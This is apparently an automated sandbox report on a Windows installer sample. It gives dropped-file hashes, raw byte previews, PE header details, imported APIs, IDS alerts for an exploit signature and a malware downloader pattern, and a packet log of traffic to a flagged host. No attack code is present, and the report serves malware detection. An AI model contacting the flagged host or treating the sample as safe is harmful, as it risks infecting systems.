Preview:	......JFIF.....H.H.....FFile source: https://www.wikihow.com/Image:Type-Step-1-Version-6.jpg...C.....................................%...#... , #&'))..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((......5.&...........................................f..........................!1Q.Aa.."q......2RS...#4BTUbru......$%3FVWest..6DEc........&'5CGd......7v.................................3.......................1.!A.Q.2aq."R.3B.....#...r............?...\|....@U..P.A@P........(.W..O3R...k(...G....<.,...4..O3B.O3C.ry.A...Q.............(....D.QE.PQ..A5D..T......(.....PM.A5PP...DMA........b...c.K....c.K...E6..q@b.(.P...P..(...`r.Ic..X..Ai.....0)E.....R..`U..@b.....i..b......Q.(.w......#}....D....(..@d..4..4.d..<...t.O3B.O3B.O3K.....<.,.<.....FO3P.2y....h..f..<...y....h..f...f...QE;..P...b.....VIb.h...qA!'..RZv..MZ..tj.M.....m..<6..\|.jK.>..o.'.J...O.o.'.J...>..H.]J..6....D.....>..H.]K....k.'.J...>..H.]B..7.zD..ZzF...H.]..#_..O......g.'.JA....T..BzV...J.]Z.J..

C:\Users\user\Uploadable\normallnnens\Trskelen\Editere.ter

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	data
Category:	dropped
Size (bytes):	380206
Entropy (8bit):	2.283052348265357
Encrypted:	false
SSDEEP:	3072:zZVDR8is0ltz1OWUk+tdYUTn16yd8aXlVDDcwTsKR9A:zZj0COWT+tb6yHXTTsKR9A
MD5:	A1DC683D395B4AAD6AADB883922026D6
SHA1:	72846E629938F0C24DEB9C8AEAD39A51190E1FF4
SHA-256:	80653E80939085343C215D19EB9035353BEB0068AB6EFA11B1BAA4E7D10E1B27
SHA-512:	A430DB1C99ACF3A3FFB73754C18A5FF39B0741B9DCBFA6E5A5CD176DF5E90B058C2958336CA98D6194751C087FCB9BA21651EAE594270255BFD5645DC3006144
Malicious:	false
Reputation:	low
Preview:	d..fa........................................=.................-................................A:..:...............q........k.....................D...Y..........................rp......4................2......C......................<)3....................G.......P...z................e.....o...............N........r...................p.......`........m............. .....a...B3.........E.......1..................................i....................s......5.......5.................h..+...................................'.....h....................o...................&.......................\|....+.............t.........................@....H.].N.........9.....#.........x....................[...F...................c...............T....................+........9................h.....D.........................`.................................JS.......w..................;.........a...m..D.........................................;............................9-...p..............Va........

C:\Users\user\Uploadable\normallnnens\Trskelen\Wodewose235.enc

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	data
Category:	dropped
Size (bytes):	34164
Entropy (8bit):	2.280731480965403
Encrypted:	false
SSDEEP:	384:Hn4soqyBjp3VRJ8c1VeHzeF8mjExy8jaw5zjnyh+:Ys3aPJzeTeMxy8j15J
MD5:	091BC262A5D568D2DD2CE1C16934963B
SHA1:	58F0086F8C18C516BBBFC86BD9F1B6098E043019
SHA-256:	34B4DFD59AE76D70C89C05E2B7D42C5177C14912E5602F3488F14CB2BEC3AE15
SHA-512:	019ACBFCFCAF1645A2E365AAC15A15B60EFC1F144CB7C9A703413BAAD79B800037589C80326BE41B487AF8B22F532526301F561EDA67B0F4B7D007A9A4451EF6
Malicious:	false
Preview:	............r.........*.................................................k..........................\|.C.................&.....................................3...........;........i>..[2....B.........B.....h.................V.............................................................0...x....<...(.............................................:............C.......q....................u..........................................................."..........g.....E..................................6..................................n......4...........O.....:..........B.O..............8......X........8...t........................... ..7.fJ#.....\|..............)........................1...........X....(..........................4.............................>.c.........F..............\........t......;.................W.............;..................................3.........L..m.........<.......(.................i...........@...........+..............o.f.....{...............bW...........4..

C:\Users\user\Uploadable\normallnnens\Trskelen\dharma.txt

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	400
Entropy (8bit):	4.340884176214527
Encrypted:	false
SSDEEP:	12:ABodXqUr8bKPlUsoyXqy6oHLrccOrMH2m:kaq+vUWqv08VMf
MD5:	71229AB517CA5DAC3316733FE5538924
SHA1:	0DB282ED1142AA8D850E0BEC60D502DF3A8D786B
SHA-256:	C7FB70336975F025E346E7B884A1641BDF4A9510315D059F1509A51249EDDD07
SHA-512:	77C36AFF187EC195EAF128B4696F54E18B297A9797922ECA97E3147EE9F49A0BA15ECB81BE7ED65C6D199D83EA8BC7823D30AACBA5B35351312EBAB25C658DDC
Malicious:	false
Preview:	retsmdes cakavci stykvrker terylene penumbrous cuprotungstite paleontology sukrings..extravasation kunstmaler naturvidenskabeliges pointer nabbers pasfotografi forholdende anesthaetically feberkramper..savvrk optimalvrdierne oversigterne.serpuloid astrobiological decimaltegn udefinerbar,acidophil gis bolvrks hretisk sprays sevald tamilske,makie adherant indsejling kassedamerne fluor pantochromism.

C:\Users\user\Uploadable\normallnnens\Trskelen\shears.sip

Download File

Process:	C:\Users\user\Desktop\u9aPQQIwhj.exe
File Type:	data
Category:	dropped
Size (bytes):	14243
Entropy (8bit):	2.3093269369302396
Encrypted:	false
SSDEEP:	192:ys2EB7EvpKyCMZFGrgNerrpDYvMo4E1+iI2tjx:ysfdCyGerrpUvxZ+7+t
MD5:	B6F7202B553B5DC0A1B7D7B141FE8A64
SHA1:	68B48ED6E05998B9F6E590510F74AD5677620EE7
SHA-256:	D1465221589C115AFA440E20E7E63E6E7D70B8DAE1CA87710A8FFD6D7D8EADC5
SHA-512:	4D7B9795444537247FF1851B0C557A1235E90DDDB49ABCDC64DBC9612BB2347D675734FAA6121D0875EF099B0C453A278C977463CE1D4453142CB19127244506
Malicious:	false
Preview:	....0.........................................(..........!.................+....................k..[............Z...............&....................$...................................;.........................................).................................;...................no.........N................k...........X..........g.....................R.........4.....h..e....................................>.....O...Q.....................r+......n..............x... .....B....................R...........................U..................................0......i....m............>................l.......[.....................................p.....................................u.....K.G...s...................3..................p..........v.......w....E......Cr.......................................................F.............m#...............].T.......................*.......j............................4a...............................n....r............b..............................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.677867455857126
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	u9aPQQIwhj.exe
File size:	749'170 bytes
MD5:	8b6b09811835191f99d4e2e9d94d232c
SHA1:	08edbf7da5b2e827978e178e5e49b45b5169d87c
SHA256:	7bcd44c32c5d526659023b033c47e867068ae604484f85a21a4788cafe5b03e7
SHA512:	d271e1036f64725e9c713b43844363b7fbcc594ee95395b90ce7777b01a43385547446afbf7b778d1211e3e7780c36ba8143786aa0261b7a940ee63b0f0fd1df
SSDEEP:	12288:8tvD9kg2V9Lki65FEx3ppAYNHS1Hf1CNoLOaZ3HC5mCO:1XlP609XkBjn
TLSH:	91F4221E35E48436C96EBE371D7DD7A7F634BF2680A02D47328C7B1B692234E461426B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.j........PE..L....f.R.................`.........X3.......p....@

File Icon


Icon Hash:	86933931792d7578

Static PE Info

General

Entrypoint:	0x403358
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B2 [Wed Dec 25 05:01:38 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	e221f4f7d36469d53810a4b5f9fc8966

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 00409230h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00407034h]
push 00008001h
call dword ptr [004070BCh]
push ebp
call dword ptr [004072ACh]
push 00000008h
mov dword ptr [00429298h], eax
call 00007FAF007EF76Ch
mov dword ptr [004291E4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 00420690h
call dword ptr [0040717Ch]
push 0040937Ch
push 004281E0h
call 00007FAF007EF3D7h
call dword ptr [00407134h]
mov ebx, 00434000h
push eax
push ebx
call 00007FAF007EF3C5h
push ebp
call dword ptr [0040710Ch]
cmp word ptr [00434000h], 0022h
mov dword ptr [004291E0h], eax
mov eax, ebx
jne 00007FAF007EC8BAh
push 00000022h
mov eax, 00434002h
pop esi
push esi
push eax
call 00007FAF007EEE16h
push eax
call dword ptr [00407240h]
mov dword ptr [esp+18h], eax
jmp 00007FAF007EC97Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007FAF007EC8B9h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007FAF007EC8ABh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7494	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x54000	0x2d490	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e66	0x6000	e8f12472e91b02deb619070e6ee7f1f4	False	0.6566569010416666	data	6.419409887460116	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x7000	0x1354	0x1400	2222fe44ebbadbc32af32dfc9c88e48e	False	0.4306640625	data	5.037511188789184	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x9000	0x202d8	0x600	a5ec1b720d350c6303a7aba8d85072bf	False	0.4733072916666667	data	3.7600484096214832	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x2a000	0x2a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x54000	0x2d490	0x2d600	3469fad129cc4f5d98277ff568dc0969	False	0.603391873278237	data	6.111326163907691	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x54358	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	United States	0.376375251390039
RT_ICON	0x64b80	0xe444	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9933089191594223
RT_ICON	0x72fc8	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 21600	English	United States	0.4520794824399261
RT_ICON	0x78450	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.4557156353330184
RT_ICON	0x7c678	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.5064315352697095
RT_ICON	0x7ec20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.551829268292683
RT_ICON	0x7fcc8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States	0.6086065573770492
RT_ICON	0x80650	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.6719858156028369
RT_DIALOG	0x80ab8	0x100	data	English	United States	0.5234375
RT_DIALOG	0x80bb8	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x80cd8	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x80da0	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x80e00	0x76	data	English	United States	0.7542372881355932
RT_VERSION	0x80e78	0x310	data	English	United States	0.4846938775510204
RT_MANIFEST	0x81188	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-31T11:44:20.063181+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	49730	TCP
2024-10-31T11:45:03.410315+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	172.202.163.200	443	192.168.2.4	62004	TCP
2024-10-31T11:45:28.117345+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	62115	84.38.133.42	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 31, 2024 11:45:26.568109989 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:26.573050022 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:26.576407909 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:26.576579094 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:26.581507921 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117253065 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117310047 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117345095 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117352009 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117362976 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117386103 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117407084 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117433071 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117435932 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117469072 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117477894 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117496967 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117528915 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117542028 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117569923 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117579937 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117613077 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117620945 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117645025 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117655993 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117685080 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.117906094 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.117948055 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.125927925 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.125981092 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.126018047 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.126065969 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.126120090 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.126153946 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.126168966 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.126202106 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.126591921 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.126641035 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.126641989 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.126674891 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.126693964 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.126710892 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.127579927 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.127614021 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.127630949 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.127649069 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.127655983 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.127693892 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.128422976 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.128468990 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.128473997 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.128506899 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.128515005 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.128552914 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.129301071 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.129333973 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.129349947 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.129369020 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.129384995 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.129415989 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.130139112 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.130187035 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.131136894 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.131182909 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.131417036 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.131465912 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.131592989 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.131639957 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.131819010 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.131869078 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.132100105 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.132145882 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.132481098 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.132529974 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.132780075 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.132828951 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.133126020 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.133173943 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.133294106 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.133337975 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.133531094 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.133577108 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.133903980 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.133954048 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.134140968 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.134187937 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.134407997 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.134449959 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.134773970 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.134819984 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.135000944 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.135049105 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.135343075 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.135389090 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.135603905 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.135668993 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.135993004 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136039972 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136111021 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136157990 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136305094 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136352062 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136396885 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136436939 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136457920 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136504889 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136689901 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136738062 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136789083 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136822939 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.136837006 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136868954 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.136995077 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.137038946 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.137200117 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.137250900 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.137415886 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.137449980 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.137473106 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.137490034 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.137710094 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.137757063 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.137864113 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.137912035 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138238907 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138273001 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138286114 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138308048 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138319969 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138341904 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138351917 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138386011 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138411045 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138443947 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138454914 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138485909 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138866901 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138900042 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.138914108 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.138945103 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.139122009 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139154911 CET	80	62115	84.38.133.42	192.168.2.4
Oct 31, 2024 11:45:28.139168978 CET	62115	80	192.168.2.4	84.38.133.42
Oct 31, 2024 11:45:28.139200926 CET	62115	80	192.168.2.4	84.38.133.42
